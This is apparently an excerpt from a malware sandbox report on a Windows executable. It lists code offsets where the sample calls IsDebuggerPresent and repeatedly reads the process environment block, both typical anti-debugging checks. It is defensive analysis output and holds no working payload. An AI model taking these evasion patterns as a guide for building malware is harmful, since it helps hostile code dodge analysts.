          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 0_2_00D91AB3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00D91AB3
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 0_2_00D869A0 mov eax, dword ptr fs:[00000030h] 0_2_00D869A0
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 0_2_012FED06 mov eax, dword ptr fs:[00000030h] 0_2_012FED06
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 0_2_012FF575 mov eax, dword ptr fs:[00000030h] 0_2_012FF575
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 0_2_012FF5B2 mov eax, dword ptr fs:[00000030h] 0_2_012FF5B2
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 0_2_012FF75D mov eax, dword ptr fs:[00000030h] 0_2_012FF75D
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 0_2_012FF615 mov eax, dword ptr fs:[00000030h] 0_2_012FF615
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_00D869A0 mov eax, dword ptr fs:[00000030h] 2_2_00D869A0
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_0151B944 mov eax, dword ptr fs:[00000030h] 2_2_0151B944
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_0151B944 mov eax, dword ptr fs:[00000030h] 2_2_0151B944
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_014FC962 mov eax, dword ptr fs:[00000030h] 2_2_014FC962
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_014FB171 mov eax, dword ptr fs:[00000030h] 2_2_014FB171
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_014FB171 mov eax, dword ptr fs:[00000030h] 2_2_014FB171
          Source: C:\Users\user\Desktop\RRW9901200241.exe